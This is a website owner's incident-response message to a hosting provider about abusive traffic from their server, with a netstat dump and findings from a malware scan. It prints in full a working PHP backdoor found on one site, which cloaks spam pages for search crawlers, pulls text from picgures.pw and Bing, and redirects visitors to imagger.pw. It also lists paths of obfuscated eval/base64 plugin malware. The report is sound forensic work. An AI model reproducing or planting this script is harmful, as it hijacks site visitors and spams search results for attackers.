Message to contabo (more details soon)

Hi,

Ok, This is my finale reply, with all actions applied and contents related to this issue.

Firstly, & using webmin panel, i find that nginx doin a big load on CPU (75% )

This give the first way to go, and its clearly that the problem is coming from an application using nginx server.

when taking a look at all applications using nginx, this is the complete list (the time of your ticket) :

-adala24

-atlassport

-bord

-nacer

-riadlakasbah

-streamaketing

-alhouriyatv

-bigsocial

-roundcubemail

-tajhize

all access and errors logs saved to this folder /var/www/html/logs.

so, the next step i did is downloaded the logs to be scaned locally.

next step is to use netstat tools to get all informations possible about connections established to and from my server. and the result looks normal & nothing refere to the reporter website lentioned in your ticket message (Domain: blogs.zemos98.org - IP: 91.192.110.86).

this is the netstat inet command output:

Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 5.189.174.109:443       105.71.131.117:50017    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:41717    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:37233    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:58614    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:38731    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:52773    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:52210    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:35883    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:34648    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:60420    SYN_RECV
tcp        0      0 5.189.174.109:443       105.71.131.117:63091    SYN_RECV
tcp        0      0 127.0.0.1:9000          127.0.0.1:42780         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42692         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42542         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42708         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42546         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42778         TIME_WAIT
tcp        0 10250 5.189.174.109:443       85.143.13.34:53930      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42830         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.7:58056      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42588         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42852         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42746         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.120.5.248:65110     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42520         TIME_WAIT
tcp        0      0 5.189.174.109:443       105.71.131.117:54617    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42782         TIME_WAIT
tcp        0      0 5.189.174.109:443       197.55.22.39:58263      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42572         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.59:54334     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42696         TIME_WAIT
tcp        0      0 5.189.174.109:80        105.71.131.117:57041    ESTABLISHED
tcp        0 47916 5.189.174.109:443       197.55.22.39:58265      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42844         TIME_WAIT
tcp        0      0 5.189.174.109:10000     196.67.77.99:52618      ESTABLISHED
tcp        0      0 5.189.174.109:10000     196.67.77.99:52614      ESTABLISHED
tcp        0      0 5.189.174.109:443       185.120.5.248:65111     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42484         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42514         TIME_WAIT
tcp        0 102240 5.189.174.109:443       85.143.13.34:53928      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42786         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42650         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42606         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42666         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42688         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42544         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42618         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.7:58050      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42550         TIME_WAIT
tcp        0      0 5.189.174.109:10000     160.166.139.138:64022   ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42796         TIME_WAIT
tcp        0      0 5.189.174.109:80        24.0.255.79:50071       ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42720         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42640         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42644         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42614         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42472         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42680         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42694         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42562         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42516         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42620         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42776         TIME_WAIT
tcp        0 64800 5.189.174.109:443       85.143.13.34:53935      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42772         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42628         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42632         TIME_WAIT
tcp        0     64 5.189.174.109:22        105.71.131.117:58954    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42790         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42730         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42548         TIME_WAIT
tcp        0      0 5.189.174.109:80        197.55.22.39:58277      ESTABLISHED
tcp        0      0 5.189.174.109:80        197.55.22.39:58278      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42734         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42848         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42676         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42528         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42598         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42682         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42494         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42856         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42476         TIME_WAIT
tcp        0      0 5.189.174.109:443       54.36.149.48:15734      TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42510         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42758         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42748         TIME_WAIT
tcp        0      0 5.189.174.109:10000     41.251.85.5:55085       ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42610         TIME_WAIT
tcp        0 140931 5.189.174.109:443       197.55.22.39:58258      ESTABLISHED
tcp        0      0 127.0.0.1:42842         127.0.0.1:9000          ESTABLISHED
tcp        0      0 5.189.174.109:10000     196.67.77.99:52603      ESTABLISHED
tcp        8      0 127.0.0.1:9000          127.0.0.1:42842         ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42624         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42574         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42840         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42482         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42702         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42800         TIME_WAIT
tcp        0      0 5.189.174.109:10000     196.67.77.99:52599      ESTABLISHED
tcp        0      0 5.189.174.109:443       185.120.5.248:65114     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42765         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42522         TIME_WAIT
tcp        0      0 5.189.174.109:80        185.244.43.59:54338     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42634         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.120.5.248:65112     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42582         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42594         TIME_WAIT
tcp        0 38880 5.189.174.109:443       85.143.13.34:53931      ESTABLISHED
tcp        0      0 5.189.174.109:10000     41.251.85.5:56082       ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42846         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42636         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42712         TIME_WAIT
tcp        0      0 5.189.174.109:443       24.0.255.79:50073       ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42652         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42616         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42530         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42754         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42540         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42704         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42826         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42648         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42586         TIME_WAIT
tcp        0      0 5.189.174.109:443       105.71.131.117:39735    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42504         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42684         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42664         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42816         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.7:58055      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42858         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42752         TIME_WAIT
tcp        0      0 5.189.174.109:22        105.71.131.117:59798    ESTABLISHED
tcp        0      0 5.189.174.109:80        185.244.43.7:58067      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42716         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42630         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42568         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42804         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42768         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42498         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42850         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42728         TIME_WAIT
tcp        0 11701 5.189.174.109:443       102.98.172.209:8326     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42866         TIME_WAIT
tcp        0    340 5.189.174.109:443       46.8.209.81:55624       ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42760         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42672         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42508         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42686         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42532         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42556         TIME_WAIT
tcp        0      0 5.189.174.109:80        185.244.43.7:58068      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42744         TIME_WAIT
tcp        0 27588 5.189.174.109:443       197.55.22.39:58262      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42654         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42862         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42642         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42832         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42576         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42740         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.59:54333     ESTABLISHED
tcp        0      0 5.189.174.109:443       185.244.43.7:58052      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42864         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.7:58054      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42474         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42742         TIME_WAIT
tcp        0      0 5.189.174.109:10000     41.251.85.5:53005       ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42656         TIME_WAIT
tcp        0      0 5.189.174.109:443       102.98.172.209:8327     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42802         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42646         TIME_WAIT
tcp        0      0 5.189.174.109:10000     196.67.77.99:52611      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42762         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42490         TIME_WAIT
tcp        0      0 5.189.174.109:80        85.143.13.34:53946      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42538         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42828         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42714         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42814         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42608         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42836         TIME_WAIT
tcp        0 16445 5.189.174.109:443       85.143.13.34:53932      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42502         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42518         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42678         TIME_WAIT
tcp        0      0 5.189.174.109:80        185.120.5.248:65115     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42808         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42710         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42596         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42706         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42834         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42824         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42700         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42820         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.7:58053      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42674         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42724         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42722         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42750         TIME_WAIT
tcp        8      0 127.0.0.1:9000          127.0.0.1:42868         ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42580         TIME_WAIT
tcp        0      0 5.189.174.109:22        105.71.131.117:33480    ESTABLISHED
tcp        0      0 5.189.174.109:22        105.71.131.117:49049    ESTABLISHED
tcp        0      0 5.189.174.109:443       185.120.5.248:65108     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42658         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42690         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42626         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42500         TIME_WAIT
tcp        0     84 5.189.174.109:22        218.92.0.192:32030      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42638         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42818         TIME_WAIT
tcp        0      0 5.189.174.109:22        105.71.131.117:46739    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42662         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42736         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42512         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42660         TIME_WAIT
tcp        0 68660 5.189.174.109:443       185.244.43.59:54336     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42558         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42480         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42570         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.120.5.248:65113     ESTABLISHED
tcp        0      0 5.189.174.109:443       5.248.165.148:63059     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42622         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42806         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42718         TIME_WAIT
tcp        0      0 5.189.174.109:443       105.71.131.117:38931    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42486         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42478         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42854         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42534         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42578         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42554         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42770         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42698         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42732         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42774         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42566         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42526         TIME_WAIT
tcp        0      0 5.189.174.109:80        185.120.5.248:65135     ESTABLISHED
tcp        0      0 5.189.174.109:443       105.71.131.117:38835    ESTABLISHED
tcp        0   4563 5.189.174.109:443       197.55.22.39:58259      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42764         TIME_WAIT
tcp        0 12211 5.189.174.109:443       197.55.22.39:58261      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42524         TIME_WAIT
tcp        0      0 5.189.174.109:22        105.71.131.117:41817    ESTABLISHED
tcp        0 32207 5.189.174.109:443       85.143.13.34:53933      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42788         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42738         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.59:54331     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42860         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.59:54337     ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42784         TIME_WAIT
tcp        0      0 127.0.0.1:42868         127.0.0.1:9000          ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42670         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42794         TIME_WAIT
tcp        0      0 5.189.174.109:10000     196.67.77.99:52598      ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42600         TIME_WAIT
tcp        0      0 5.189.174.109:443       105.71.131.117:37388    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42536         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42552         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42584         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42810         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42726         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42592         TIME_WAIT
tcp        0      0 5.189.174.109:22        105.71.131.117:33398    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42604         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42838         TIME_WAIT
tcp        0      0 5.189.174.109:443       185.244.43.59:54335     ESTABLISHED
tcp        0      0 5.189.174.109:443       54.36.150.114:45894     TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42488         TIME_WAIT
tcp        0      0 5.189.174.109:443       105.71.131.117:46672    ESTABLISHED
tcp        0      0 127.0.0.1:9000          127.0.0.1:42612         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42506         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42668         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42812         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42822         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42602         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42756         TIME_WAIT
tcp        0      0 127.0.0.1:9000          127.0.0.1:42590         TIME_WAIT

so, basically, there are no applications make connections with the reporter website (server).

after that, all web files (in all applications using nginx on my server -as mentioned above) are compressed and uploaded to another server for a full scan.

the first unusual things i find is some scripts make a CURL POSTs requests then redirect visitors comming from search engins to external websites (its look like a stoolen traffic methode) !

example:

File Name: 7jorpvoqi.php

File Path (before deleted): /var/www/html/riadlakasbah/homiw6ih/7jorpvoqi.php

File contents (code):

<?php

$f1 = ".ht"; $f2 = "acc"; $f3 = "ess";
$ff = $f1.$f2.$f3;

if (file_exists($ff)) chmod ($ff, 0777);
if (file_exists($ff)) unlink ($ff);

$cache_folder = "wtuds";
$template_folder = "nptoris";

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;

if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
    $isbot = 1;
    }

if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
    $isbot = 1;
}

if ($isbot)
{

    $myname = $cache_folder."/".$_GET["drhytk"];
    if (file_exists($myname))
    {
    $html = file($myname);
    $html = implode($html, "");
    echo $html;
    exit;
    }

$template = scandir($template_folder);
$template = $template[rand(2,sizeof($template)-1)];
$tpl = $template_folder."/".$template;
$tpl = file($tpl);

$keyword = str_replace("-", " ", $_GET["drhytk"]);
$keyword = chop($keyword);
$keyword = ucfirst($keyword);

$query_pars = $keyword;
$query_pars_2 = str_replace(" ", "+", chop($query_pars));
$query_pars_2 = mb_strtolower($query_pars_2);

$text = "";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://picgures.pw/story2.php?q=$query_pars_2&pass=qwerty8");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$text = curl_exec($ch);
curl_close($ch);

if (strlen($text)<1000)
{

    for ($page=1;$page<145;$page=$page+10)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www4.bing.com/search?q=$query_pars_2&first=$page");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
//curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
$result = curl_exec($ch);
curl_close($ch);
//echo $result;

        preg_match_all ("#</div><p>(.*)</p></div>#iU",$result,$m);
        foreach ($m[1] as $a) $text .= $a;

}


$text = str_replace("...", "", $text);
        $text = strip_tags($text);
        $text = str_replace(" ", " ", $text);
        $text = str_replace(" ", " ", $text);
        $text = str_replace(" ", " ", $text);
        $text = str_replace(" ", " ", $text);
        $text = str_replace(" ", " ", $text);
        $text = str_replace(" ", " ", $text);
        $text = str_replace(" ", " ", $text);

        $text = explode(".", $text);
        shuffle($text);
        $text = array_unique($text);
        $text = implode(". ", $text);
}

         $html = implode ("\n", $tpl);
/*
$titlename = $_SERVER['SERVER_NAME'];
$titlename = explode(".", $titlename);
$titlename = strtoupper($titlename[0]);
if (strlen($titlename)>1) $html=str_replace("<title>{keyword}</title>", "<title>$keyword | $titlename</title>", $html);
    */
        $html = str_replace("{keyword}", $keyword, $html);
        $html = str_replace("{manytext_bing}", $text, $html);

        $out = fopen($myname, "w");
        fwrite($out, $html);
        fclose($out);

        echo $html;

}

if(!@$isbot)
{

$keyword = str_replace("-", " ", $_GET["drhytk"]);
$keyword = str_replace(" ", "+", $keyword);

$ref = $_SERVER["HTTP_REFERER"];
$d = $_SERVER["HTTP_HOST"];
$mykeys = $_GET["drhytk"];

header("Location: http://imagger.pw/sf/77?d=$d&mykeys=$mykeys");

exit;
}

As you can see that this script make CURL request to picgures.pw and www4.bing.com (after some tests on agents in header), then redirect to this website imagger.pw.

While this script make connections that maybe unwanted by the website owner, that mean this is a malicious script. so its deleted with all related files and folders.

Howver, this is still not responding on the ticket subject, because the reporter say that my server make connections like a bot !

so, im gone deep and search for all unusual codes and functions may be used for bad things.

all websites look good and no bad code injected but this one "tajhize.com" at the path /var/www/html/tajhize. where i find a lot of scripts use eval() function in a way in a suspicious way in addition of base64_encode().

when i decrypte some of this base64 hashes i find that its used for contacting external links, and send data from this websites to others. examples:

/var/www/html/tajhize/wp-content/plugins/login_wall_lhq/ring.php

/var/www/html/tajhize/wp-content/plugins/login_wall_lhq/au.php

/var/www/html/tajhize/wp-content/plugins/login_wall_lhq/comments.php

/var/www/html/tajhize/wp-content/plugins/login_wall_lhq/login_wall.php

/var/www/html/tajhize/wp-content/plugins/login_wall_lhq/pi.php

the contents of this scripts is in joined folder (zipped) named login_wall_lhq.zip

also, there are other folders contain the same contents, like this

/var/www/html/tajhize/wp-content/plugins/login_wall_dpn

(the only difference is just dpn instead of lhq).

another example of malicious codes founded in hidden files as below:

/var/www/html/tajhize/wp-content/.409b2740.ico

/var/www/html/tajhize/wp-content/themes/.36144752.ico

/var/www/html/tajhize/wp-content/plugins/2311186

...and the files in other locations (such as plugins subfolders and themes folders)

the content of files with the names above have been joined.

when we return to logs scan, i find that some servers requesting infected files continuously.

example 1:

-called file hosted on my server: /var/www/html/tajhize/wp-content/plugins/login_wall_dpn/ring.php

-external server request this file: 192.154.105.154

example 2:

-called file hosted on my server: /var/www/html/tajhize//wp-login.php

-external server request this file: 51.15.180.239

how i know this is a server and not a pc/phone/..etc?

simple, firstly it call my server continuously in a very short time (one request per second) and if you take a look at this server using web browser: http://51.15.180.239

you will be redirected to this website: www.yohanfouquet.ovh (from the domain extension, its registred at OVH).

and this is a part from the access_log file of this website (tajhize.com):

